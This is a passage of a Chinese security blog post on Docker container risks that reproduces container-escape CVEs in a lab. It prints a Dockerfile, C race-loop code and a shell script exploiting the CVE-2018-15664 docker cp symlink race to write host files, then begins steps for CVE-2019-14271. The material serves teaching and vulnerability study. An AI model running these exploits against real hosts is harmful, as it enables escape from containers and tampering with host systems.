<!DOCTYPE html>
<html lang="zh-cn">
    <head>
        <meta charset="utf-8">
        <meta name="viewport" content="width=device-width, initial-scale=1">
        <meta name="robots" content="noodp" />
        <meta http-equiv="X-UA-Compatible" content="IE=edge, chrome=1">
        <title>容器安全 - Geekby&#39;s Blog</title><meta name="Description" content="容器基础设施的安全风险分析"><meta property="og:title" content="容器安全" />
<meta property="og:description" content="容器基础设施的安全风险分析" />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://www.geekby.site/2021/11/%E5%AE%B9%E5%99%A8%E5%AE%89%E5%85%A8/" /><meta property="article:section" content="posts" />
<meta property="article:published_time" content="2021-11-10T15:23:00+08:00" />
<meta property="article:modified_time" content="2021-11-13T11:00:00+08:00" />

<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="容器安全"/>
<meta name="twitter:description" content="容器基础设施的安全风险分析"/>
<meta name="application-name" content="Geekby&#39;s Blog">
<meta name="apple-mobile-web-app-title" content="Geekby&#39;s Blog"><link rel="shortcut icon" type="image/x-icon" href="/favicon.ico" />
        <link rel="icon" type="image/png" sizes="32x32" href="/favicon-32x32.png">
        <link rel="icon" type="image/png" sizes="16x16" href="/favicon-16x16.png"><link rel="apple-touch-icon" sizes="180x180" href="/apple-touch-icon.png"><link rel="manifest" href="/site.webmanifest"><link rel="canonical" href="https://www.geekby.site/2021/11/%E5%AE%B9%E5%99%A8%E5%AE%89%E5%85%A8/" /><link rel="prev" href="https://www.geekby.site/2021/10/docker%E6%A0%B8%E5%BF%83%E6%8A%80%E6%9C%AF/" /><link rel="next" href="https://www.geekby.site/2021/11/javascript%E5%8F%8D%E6%B7%B7%E6%B7%86/" /><link rel="stylesheet" href="/lib/normalize/normalize.min.css"><link rel="stylesheet" href="/css/style.min.css"><link rel="stylesheet" href="/lib/fontawesome-free/all.min.css"><link rel="stylesheet" href="/lib/animate/animate.min.css"><script type="application/ld+json">
    {
        "@context": "http://schema.org",
        "@type": "BlogPosting",
        "headline": "容器安全",
        "inLanguage": "zh-cn",
        "mainEntityOfPage": {
            "@type": "WebPage",
            "@id": "https:\/\/www.geekby.site\/2021\/11\/%E5%AE%B9%E5%99%A8%E5%AE%89%E5%85%A8\/"
        },"image": ["https:\/\/www.geekby.site\/logo.png"],"genre": "posts","keywords": "云原生安全, docker","wordcount":  1441 ,
        "url": "https:\/\/www.geekby.site\/2021\/11\/%E5%AE%B9%E5%99%A8%E5%AE%89%E5%85%A8\/","datePublished": "2021-11-10T15:23:00+08:00","dateModified": "2021-11-13T11:00:00+08:00","publisher": {
            "@type": "Organization",
            "name": "Geekby","logo": {
                    "@type": "ImageObject",
                    "url": "https:\/\/www.geekby.site\/images\/avatar.png",
                    "width":  358 ,
                    "height":  330 
                }},"author": {
                "@type": "Person",
                "name": "Geekby"
            },"description": "容器基础设施的安全风险分析"
    }
    </script></head>
    <body header-desktop="" header-mobile=""><script type="text/javascript">(window.localStorage && localStorage.getItem('theme') ? localStorage.getItem('theme') === 'dark' : ('auto' === 'auto' ? window.matchMedia('(prefers-color-scheme: dark)').matches : 'auto' === 'dark')) && document.body.setAttribute('theme', 'dark');</script>

        <div id="mask"></div><div class="wrapper"><header class="desktop" id="header-desktop">
    <div class="header-wrapper">
        <div class="header-title">
            <a href="/" title="Geekby&#39;s Blog">Geekby&#39;s Blog</a>
        </div>
        <div class="menu">
            <div class="menu-inner"><a class="menu-item" href="/posts/" title="文章"><i class="fas fa-inbox"></i> 文章 </a><a class="menu-item" href="/tags/" title="标签"><i class="fas fa-tags"></i> 标签 </a><a class="menu-item" href="/categories/" title="分类"><i class="fas fa-sort-amount-up-alt"></i> 分类 </a><a class="menu-item" href="/about/" title="关于"><i class="far fa-address-card"></i> 关于 </a><span class="menu-item delimiter"></span><span class="menu-item search" id="search-desktop">
                        <input type="text" placeholder="输入关键字" id="search-input-desktop">
                        <a href="javascript:void(0);" class="search-button search-toggle" id="search-toggle-desktop" title="搜索">
                            <i class="fas fa-search fa-fw"></i>
                        </a>
                        <a href="javascript:void(0);" class="search-button search-clear" id="search-clear-desktop" title="清空">
                            <i class="fas fa-times-circle fa-fw"></i>
                        </a>
                        <span class="search-button search-loading" id="search-loading-desktop">
                            <i class="fas fa-spinner fa-fw fa-spin"></i>
                        </span>
                    </span><a href="javascript:void(0);" class="menu-item theme-switch" title="切换主题">
                    <i class="fas fa-adjust fa-fw"></i>
                </a>
            </div>
        </div>
    </div>
</header><header class="mobile" id="header-mobile">
    <div class="header-container">
        <div class="header-wrapper">
            <div class="header-title">
                <a href="/" title="Geekby&#39;s Blog">Geekby&#39;s Blog</a>
            </div>
            <div class="menu-toggle" id="menu-toggle-mobile">
                <span></span><span></span><span></span>
            </div>
        </div>
        <div class="menu" id="menu-mobile"><div class="search-wrapper">
                    <div class="search mobile" id="search-mobile">
                        <input type="text" placeholder="输入关键字" id="search-input-mobile">
                        <a href="javascript:void(0);" class="search-button search-toggle" id="search-toggle-mobile" title="搜索">
                            <i class="fas fa-search fa-fw"></i>
                        </a>
                        <a href="javascript:void(0);" class="search-button search-clear" id="search-clear-mobile" title="清空">
                            <i class="fas fa-times-circle fa-fw"></i>
                        </a>
                        <span class="search-button search-loading" id="search-loading-mobile">
                            <i class="fas fa-spinner fa-fw fa-spin"></i>
                        </span>
                    </div>
                    <a href="javascript:void(0);" class="search-cancel" id="search-cancel-mobile">
                        取消
                    </a>
                </div><a class="menu-item" href="/posts/" title="文章"><i class="fas fa-inbox"></i>文章</a><a class="menu-item" href="/tags/" title="标签"><i class="fas fa-tags"></i>标签</a><a class="menu-item" href="/categories/" title="分类"><i class="fas fa-sort-amount-up-alt"></i>分类</a><a class="menu-item" href="/about/" title="关于"><i class="far fa-address-card"></i>关于</a><a href="javascript:void(0);" class="menu-item theme-switch" title="切换主题">
                <i class="fas fa-adjust fa-fw"></i>
            </a></div>
    </div>
</header>
<div class="search-dropdown desktop">
    <div id="search-dropdown-desktop"></div>
</div>
<div class="search-dropdown mobile">
    <div id="search-dropdown-mobile"></div>
</div>
<main class="main">
                <div class="container"><div class="toc" id="toc-auto">
            <h2 class="toc-title">目录</h2>
            <div class="toc-content" id="toc-content-auto"></div>
        </div><article class="page single"><h1 class="single-title animated flipInX">容器安全</h1><div class="post-meta">
            <div class="post-meta-line"><span class="post-author"><a href="/" title="Author" rel=" author" class="author"><i class="fas fa-user-circle fa-fw"></i>Geekby</a></span>&nbsp;<span class="post-category">收录于 <a href="/categories/%E4%BA%91%E5%8E%9F%E7%94%9F%E5%AE%89%E5%85%A8/"><i class="far fa-folder fa-fw"></i>云原生安全</a></span></div>
            <div class="post-meta-line"><i class="far fa-calendar-alt fa-fw"></i>&nbsp;<time datetime="2021-11-10">2021-11-10</time>&nbsp;<i class="fas fa-pencil-alt fa-fw"></i>&nbsp;约 1441 字&nbsp;
                <i class="far fa-clock fa-fw"></i>&nbsp;预计阅读 7 分钟&nbsp;</div>
        </div><div class="details toc" id="toc-static"  kept="">
                <div class="details-summary toc-title">
                    <span>目录</span>
                    <span><i class="details-icon fas fa-angle-right"></i></span>
                </div>
                <div class="details-content toc-content" id="toc-content-static"><nav id="TableOfContents">
  <ul>
    <li><a href="#1-针对容器开发测试过程中的攻击案例">1 针对容器开发测试过程中的攻击案例</a>
      <ul>
        <li><a href="#11-背景">1.1 背景</a></li>
        <li><a href="#12-cve-2018-15664---符号链接替换漏洞">1.2 CVE-2018-15664 - 符号链接替换漏洞</a>
          <ul>
            <li><a href="#121-原理">1.2.1 原理</a></li>
            <li><a href="#122-漏洞复现">1.2.2 漏洞复现</a></li>
          </ul>
        </li>
        <li><a href="#13-cve-2019-14271">1.3 CVE-2019-14271</a>
          <ul>
            <li><a href="#131-原理">1.3.1 原理</a></li>
            <li><a href="#132-漏洞复现">1.3.2 漏洞复现</a>
              <ul>
                <li><a href="#1321-确定目标">1.3.2.1 确定目标</a></li>
                <li><a href="#1322-构建动态链接库">1.3.2.2 构建动态链接库</a></li>
                <li><a href="#1323-逃逸">1.3.2.3 逃逸</a></li>
              </ul>
            </li>
          </ul>
        </li>
      </ul>
    </li>
    <li><a href="#2-针对容器软件供应链的攻击案例">2 针对容器软件供应链的攻击案例</a>
      <ul>
        <li><a href="#21-镜像漏洞利用">2.1 镜像漏洞利用</a></li>
        <li><a href="#22-镜像投毒">2.2 镜像投毒</a></li>
      </ul>
    </li>
    <li><a href="#3-针对容器运行时的攻击">3 针对容器运行时的攻击</a>
      <ul>
        <li><a href="#31-不安全配置导致的容器逃逸">3.1 不安全配置导致的容器逃逸</a>
          <ul>
            <li><a href="#311-privileged-特权模式运行容器">3.1.1 privileged 特权模式运行容器</a></li>
          </ul>
        </li>
        <li><a href="#32-危险挂载导致的容器逃逸">3.2 危险挂载导致的容器逃逸</a>
          <ul>
            <li><a href="#321-挂载-docker-socket-的情况">3.2.1 挂载 Docker Socket 的情况</a></li>
            <li><a href="#322-挂载主机-procfs-的情况">3.2.2 挂载主机 procfs 的情况</a></li>
          </ul>
        </li>
      </ul>
    </li>
    <li><a href="#4-相关程序漏洞导致的容器逃逸">4 相关程序漏洞导致的容器逃逸</a>
      <ul>
        <li><a href="#41-cve-2019-5736">4.1 CVE-2019-5736</a>
          <ul>
            <li><a href="#411-原理">4.1.1 原理</a></li>
            <li><a href="#412-复现">4.1.2 复现</a></li>
          </ul>
        </li>
      </ul>
    </li>
    <li><a href="#5-内核漏洞导致的容器逃逸">5 内核漏洞导致的容器逃逸</a>
      <ul>
        <li><a href="#51-cve-2016-5195">5.1 CVE-2016-5195</a></li>
      </ul>
    </li>
    <li><a href="#参考">参考</a></li>
  </ul>
</nav></div>
            </div><div class="content" id="content"><h1 id="容器基础设施的安全风险分析">容器基础设施的安全风险分析</h1>
<p>在云原生生态中已经有很多种不同的容器运行时实现，但考虑到稳定性和使用的广泛程度，下面仍以 docker 为例进行分析。</p>
<p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202111101917031.webp-water_print"
        data-srcset="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202111101917031.webp-water_print, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202111101917031.webp-water_print 1.5x, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202111101917031.webp-water_print 2x"
        data-sizes="auto"
        alt="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202111101917031.webp-water_print"
        title="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202111101917031.webp-water_print" /></p>
<p>从容器镜像、活动容器、容器网络、容器管理接口、宿主机操作系统和软件漏洞等六方面来分析容器基础设施可能存在的风险。</p>
<h2 id="1-针对容器开发测试过程中的攻击案例">1 针对容器开发测试过程中的攻击案例</h2>
<h3 id="11-背景">1.1 背景</h3>
<ol>
<li>docker cp 命令</li>
</ol>
<blockquote>
<p>docker cp 命令用于在 Docker 创建的容器中与宿主机文件系统之间进行文件或目录复制。</p>
</blockquote>
<ol start="2">
<li>符号链接</li>
</ol>
<blockquote>
<p>符号链接 - 软连接。类似于 windows 上的快捷方式
在 linux 中创建符号链接：</p>
</blockquote>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">ln -s target_path link_path
</span></span></code></pre></td></tr></table>
</div>
</div><h3 id="12-cve-2018-15664---符号链接替换漏洞">1.2 CVE-2018-15664 - 符号链接替换漏洞</h3>
<p>影响版本：Docker 在 <code>17.06.0-ce～17.12.1-ce:rc2</code>，<code>18.01.0-ce～18.06.1-ce:rc2</code> 版本范围内受该漏洞影响</p>
<h4 id="121-原理">1.2.1 原理</h4>
<p>漏洞 poc 参考作者 Aleksa Sarai 公布的 poc 文件：<a href="https://seclists.org/oss-sec/2019/q2/131" target="_blank" rel="noopener noreffer">https://seclists.org/oss-sec/2019/q2/131</a></p>
<p>CVE-2018-15664 实际上是一个 <code>TOCTOU</code>(time-of-check to time-of-use) 的问题。当用户执行 <code>docker cp</code> 命令后，Docker 守护进程接收到请求，会对用户给出的复制路径进行检查。如果路径中有容器内部的符号链接，则现在容器内部将其解析成对应的路径字符串，留待后用。</p>
<p>如果在 Docker 守护进程检查复制路径时，攻击者在这里先放置一个非符号链接的的常规文件或目录，检查结束后，攻击者在 Docker 守护进程使用路径前将其替换为一个符号链接，那么这个符号链接就会被打开时在宿主机上解析，从而导致目录穿越。</p>
<h4 id="122-漏洞复现">1.2.2 漏洞复现</h4>
<p>利用 <a href="https://github.com/Metarget/metarget" target="_blank" rel="noopener noreffer">metarget</a> 快速搭建 CVE-2018-15664 环境：</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">./metarget cnv install cve-2018-15664
</span></span></code></pre></td></tr></table>
</div>
</div><p>下载并解压 <a href="https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0302-%e5%bc%80%e5%8f%91%e4%be%a7%e6%94%bb%e5%87%bb/02-CVE-2018-15664/symlink_race" target="_blank" rel="noopener noreffer">PoC</a></p>
<p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202111101858440.png-water_print"
        data-srcset="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202111101858440.png-water_print, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202111101858440.png-water_print 1.5x, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202111101858440.png-water_print 2x"
        data-sizes="auto"
        alt="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202111101858440.png-water_print"
        title="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202111101858440.png-water_print" /></p>
<p>其中， build  目录包含了用来编译 EXP 的 Dockerfile 和漏洞利用源代码 symlink_swap.c</p>
<div class="details admonition tip open">
        <div class="details-summary admonition-title">
            <i class="icon fas fa-lightbulb fa-fw"></i>注意<i class="details-icon fas fa-angle-right fa-fw"></i>
        </div>
        <div class="details-content">
            <div class="admonition-content">构建镜像时，在容器内安装 gcc 时报错，可以先在宿主机将 symlink_swap 编译好，再 COPY 到容器中。</div>
        </div>
    </div>
<p>修改后的 Dockerfile：</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt"> 1
</span><span class="lnt"> 2
</span><span class="lnt"> 3
</span><span class="lnt"> 4
</span><span class="lnt"> 5
</span><span class="lnt"> 6
</span><span class="lnt"> 7
</span><span class="lnt"> 8
</span><span class="lnt"> 9
</span><span class="lnt">10
</span><span class="lnt">11
</span><span class="lnt">12
</span><span class="lnt">13
</span><span class="lnt">14
</span><span class="lnt">15
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-dockerfile" data-lang="dockerfile"><span class="line"><span class="cl"><span class="c"># Build the binary.</span><span class="err">
</span></span></span><span class="line"><span class="cl"><span class="err"></span><span class="k">FROM</span><span class="s"> opensuse/tumbleweed</span><span class="err">
</span></span></span><span class="line"><span class="cl"><span class="err"></span><span class="c"># RUN zypper in -y gcc glibc-devel-static</span><span class="err">
</span></span></span><span class="line"><span class="cl"><span class="err"></span><span class="k">RUN</span> mkdir /builddir<span class="err">
</span></span></span><span class="line"><span class="cl"><span class="err"></span><span class="k">COPY</span> symlink_swap.c /builddir/symlink_swap.c<span class="err">
</span></span></span><span class="line"><span class="cl"><span class="err"></span><span class="c"># RUN gcc -Wall -Werror -static -lpthread -o /builddir/symlink_swap /builddir/symlink_swap.c</span><span class="err">
</span></span></span><span class="line"><span class="cl"><span class="err"></span><span class="k">COPY</span> symlink_swap /builddir/symlink_swap<span class="err">
</span></span></span><span class="line"><span class="cl"><span class="err">
</span></span></span><span class="line"><span class="cl"><span class="err"></span><span class="c"># Set up our malicious rootfs.</span><span class="err">
</span></span></span><span class="line"><span class="cl"><span class="err"></span><span class="k">FROM</span><span class="s"> opensuse/tumbleweed</span><span class="err">
</span></span></span><span class="line"><span class="cl"><span class="err"></span><span class="k">ARG</span> <span class="nv">SYMSWAP_TARGET</span><span class="o">=</span>/w00t_w00t_im_a_flag<span class="err">
</span></span></span><span class="line"><span class="cl"><span class="err"></span><span class="k">ARG</span> <span class="nv">SYMSWAP_PATH</span><span class="o">=</span>/totally_safe_path<span class="err">
</span></span></span><span class="line"><span class="cl"><span class="err"></span><span class="k">RUN</span> <span class="nb">echo</span> <span class="s2">&#34;FAILED -- INSIDE CONTAINER PATH&#34;</span> &gt;<span class="s2">&#34;</span><span class="nv">$SYMSWAP_TARGET</span><span class="s2">&#34;</span><span class="err">
</span></span></span><span class="line"><span class="cl"><span class="err"></span><span class="k">COPY</span> --from<span class="o">=</span><span class="m">0</span> /builddir/symlink_swap /symlink_swap<span class="err">
</span></span></span><span class="line"><span class="cl"><span class="err"></span><span class="k">ENTRYPOINT</span> <span class="p">[</span><span class="s2">&#34;/symlink_swap&#34;</span><span class="p">]</span><span class="err">
</span></span></span></code></pre></td></tr></table>
</div>
</div><p>Dockerfile 的主要内容是构建漏洞利用程序，并将其放在容器的根目录下，并在根目录下创建一个 <code>w00t_w00t_im_a_flag</code> 文件，内容为：<code>FAILED -- INSIDE CONTAINER PATH</code>。容器启动后执行的程序(<code>Entrypoint</code>) 即为：symlink_swap。</p>
<p>Symlink_swap.c 内容：</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt"> 1
</span><span class="lnt"> 2
</span><span class="lnt"> 3
</span><span class="lnt"> 4
</span><span class="lnt"> 5
</span><span class="lnt"> 6
</span><span class="lnt"> 7
</span><span class="lnt"> 8
</span><span class="lnt"> 9
</span><span class="lnt">10
</span><span class="lnt">11
</span><span class="lnt">12
</span><span class="lnt">13
</span><span class="lnt">14
</span><span class="lnt">15
</span><span class="lnt">16
</span><span class="lnt">17
</span><span class="lnt">18
</span><span class="lnt">19
</span><span class="lnt">20
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="cm">/*
</span></span></span><span class="line"><span class="cl"><span class="cm">     * Now create a symlink to &#34;/&#34; (which will resolve to the host&#39;s root if we
</span></span></span><span class="line"><span class="cl"><span class="cm">     * win the race) and a dummy directory at stash_path for us to swap with.
</span></span></span><span class="line"><span class="cl"><span class="cm">     * We use a directory to remove the possibility of ENOTDIR which reduces
</span></span></span><span class="line"><span class="cl"><span class="cm">     * the chance of us winning.
</span></span></span><span class="line"><span class="cl"><span class="cm">     */</span>
</span></span><span class="line"><span class="cl">    <span class="k">if</span> <span class="p">(</span><span class="n">symlink</span><span class="p">(</span><span class="s">&#34;/&#34;</span><span class="p">,</span> <span class="n">symlink_path</span><span class="p">)</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">        <span class="n">bail</span><span class="p">(</span><span class="s">&#34;create symlink_path&#34;</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">    <span class="k">if</span> <span class="p">(</span><span class="n">mkdir</span><span class="p">(</span><span class="n">stash_path</span><span class="p">,</span> <span class="mo">0755</span><span class="p">)</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">        <span class="n">bail</span><span class="p">(</span><span class="s">&#34;mkdir stash_path&#34;</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="cm">/* Now we do a RENAME_EXCHANGE forever. */</span>
</span></span><span class="line"><span class="cl">    <span class="k">for</span> <span class="p">(;;)</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">        <span class="kt">int</span> <span class="n">err</span> <span class="o">=</span> <span class="n">rrenameat2</span><span class="p">(</span><span class="n">AT_FDCWD</span><span class="p">,</span> <span class="n">symlink_path</span><span class="p">,</span>
</span></span><span class="line"><span class="cl">                            <span class="n">AT_FDCWD</span><span class="p">,</span> <span class="n">stash_path</span><span class="p">,</span> <span class="n">RENAME_EXCHANGE</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">        <span class="k">if</span> <span class="p">(</span><span class="n">err</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">            <span class="n">perror</span><span class="p">(</span><span class="s">&#34;symlink_swap: rename exchange failed&#34;</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">    <span class="p">}</span>
</span></span><span class="line"><span class="cl">    <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span></code></pre></td></tr></table>
</div>
</div><p>在容器内创建指向根目录的符号链接，并不断地交换符号链接(由命令行参数传入，如「totaly_safe_path」)与一个正常的目录(如：「totaly_safe_path-stashed」)的名字。</p>
<p>run_read.sh : 实现读取宿主机文件内容的 shell 脚本</p>
<p>run_write.sh : 实现在宿主机写文件的 shell 脚本</p>
<p>以 <code>run_write.sh</code> 为例：</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt"> 1
</span><span class="lnt"> 2
</span><span class="lnt"> 3
</span><span class="lnt"> 4
</span><span class="lnt"> 5
</span><span class="lnt"> 6
</span><span class="lnt"> 7
</span><span class="lnt"> 8
</span><span class="lnt"> 9
</span><span class="lnt">10
</span><span class="lnt">11
</span><span class="lnt">12
</span><span class="lnt">13
</span><span class="lnt">14
</span><span class="lnt">15
</span><span class="lnt">16
</span><span class="lnt">17
</span><span class="lnt">18
</span><span class="lnt">19
</span><span class="lnt">20
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-sh" data-lang="sh"><span class="line"><span class="cl"><span class="nv">SYMSWAP_PATH</span><span class="o">=</span>/totally_safe_path
</span></span><span class="line"><span class="cl"><span class="nv">SYMSWAP_TARGET</span><span class="o">=</span>/w00t_w00t_im_a_flag
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="c1"># Create our flag.</span>
</span></span><span class="line"><span class="cl"><span class="nb">echo</span> <span class="s2">&#34;FAILED -- HOST FILE UNCHANGED&#34;</span> <span class="p">|</span> sudo tee <span class="s2">&#34;</span><span class="nv">$SYMSWAP_TARGET</span><span class="s2">&#34;</span>
</span></span><span class="line"><span class="cl">sudo chmod <span class="m">0444</span> <span class="s2">&#34;</span><span class="nv">$SYMSWAP_TARGET</span><span class="s2">&#34;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="c1"># Run and build the malicious image.</span>
</span></span><span class="line"><span class="cl">docker build -t cyphar/symlink_swap <span class="se">\
</span></span></span><span class="line"><span class="cl"><span class="se"></span>	--build-arg <span class="s2">&#34;SYMSWAP_PATH=</span><span class="nv">$SYMSWAP_PATH</span><span class="s2">&#34;</span> <span class="se">\
</span></span></span><span class="line"><span class="cl"><span class="se"></span>	--build-arg <span class="s2">&#34;SYMSWAP_TARGET=</span><span class="nv">$SYMSWAP_TARGET</span><span class="s2">&#34;</span> build/
</span></span><span class="line"><span class="cl"><span class="nv">ctr_id</span><span class="o">=</span><span class="k">$(</span>docker run --rm -d cyphar/symlink_swap <span class="s2">&#34;</span><span class="nv">$SYMSWAP_PATH</span><span class="s2">&#34;</span><span class="k">)</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="nb">echo</span> <span class="s2">&#34;SUCCESS -- HOST FILE CHANGED&#34;</span> <span class="p">|</span> tee localpath
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="c1"># Now continually try to copy the files.</span>
</span></span><span class="line"><span class="cl"><span class="k">while</span> <span class="nb">true</span>
</span></span><span class="line"><span class="cl"><span class="k">do</span>
</span></span><span class="line"><span class="cl">	docker cp localpath <span class="s2">&#34;</span><span class="si">${</span><span class="nv">ctr_id</span><span class="si">}</span><span class="s2">:</span><span class="nv">$SYMSWAP_PATH</span><span class="s2">/</span><span class="nv">$SYMSWAP_TARGET</span><span class="s2">&#34;</span>
</span></span><span class="line"><span class="cl"><span class="k">done</span>
</span></span></code></pre></td></tr></table>
</div>
</div><p>run_write.sh 启动后恶意容器运行，然后不断执行 docker cp 命令</p>
<p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202111101901056.png-water_print"
        data-srcset="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202111101901056.png-water_print, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202111101901056.png-water_print 1.5x, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202111101901056.png-water_print 2x"
        data-sizes="auto"
        alt="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202111101901056.png-water_print"
        title="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202111101901056.png-water_print" /></p>
<h3 id="13-cve-2019-14271">1.3 CVE-2019-14271</h3>
<p>影响 Docker 19.03.x before 19.03.1</p>
<h4 id="131-原理">1.3.1 原理</h4>
<p>docker cp 命令依赖的 docker-tar 组件会加载容器内部的 nsswitch 动态链接库，攻击者可以通过劫持容器内部的 nsswitch 来实现代码的注入，获得宿主机上的 root 权限的代码执行能力。</p>
<p>用户在执行 docker cp 后，Docker 守护进程启动 <code>docker-tar</code> 进程来完成复制。以「从容器内文件复制到宿主机为例」，它会切换进程的根目录(执行 chroot)到容器根目录，将需要复制的文件打包，然后传递给 Docker 守护进程，Docker 守护进程负责将内容解析到用户指定的宿主机目标路径。</p>
<p>chroot 的操作主要是为了避免符号链接导致的路径穿越问题，但存在漏洞版本的 <code>docker-tar</code> 会加载必要的动态链接库，主要以 <code>libness_</code> 开头的 nsswitch 动态链接库。chroot 切换根目录后，<code>docker-tar</code> 将加载容器内部的动态链接库。</p>
<p>漏洞利用过程如下：</p>
<ul>
<li>找出 <code>docker-tar</code> 具体会加载哪些容器内的动态链接库。</li>
<li>下载对应的动态链接库源码，增加 <code>__attribute__</code> 属性的函数 <code>run_at_link</code>(该函数在动态链接库被加载时首先执行)</li>
<li>等待 docker cp 触发漏洞</li>
</ul>
<h4 id="132-漏洞复现">1.3.2 漏洞复现</h4>
<h5 id="1321-确定目标">1.3.2.1 确定目标</h5>
<p>确定 docker cp 执行中用到哪些容器内的动态链接库。</p>
<p>在存在漏洞的 Docker 环境中，创建容器：</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">docker run -itd --name<span class="o">=</span><span class="nb">test</span> ubuntu
</span></span></code></pre></td></tr></table>
</div>
</div><p>寻找容器在宿主机上的绝对路径：</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">docker <span class="nb">exec</span> -it <span class="nb">test</span> cat /proc/mounts <span class="p">|</span> grep docker
</span></span></code></pre></td></tr></table>
</div>
</div><p>返回结果包含：</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">workdir=/var/lib/docker/overlay2/42549fa40947a72bc4f3ae8b8676297d774d4fe2f8afb7122717548b06861d85/work
</span></span></code></pre></td></tr></table>
</div>
</div><p>容器在宿主机上的绝对路径即为：<code>/var/lib/docker/overlay2/42549fa40947a72bc4f3ae8b8676297d774d4fe2f8afb7122717548b06861d85/merged</code></p>
<p>安装监控文件：</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">apt install inotify-tools
</span></span></code></pre></td></tr></table>
</div>
</div><p>监控文件夹：</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">inotifywait -mr /var/lib/docker/overlay2/42549fa40947a72bc4f3ae8b8676297d774d4fe2f8afb7122717548b06861d85/merged/lib
</span></span></code></pre></td></tr></table>
</div>
</div><p>执行 docker cp</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">docker cp test:/etc/passwd ./
</span></span></code></pre></td></tr></table>
</div>
</div><p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202111111535776.png-water_print"
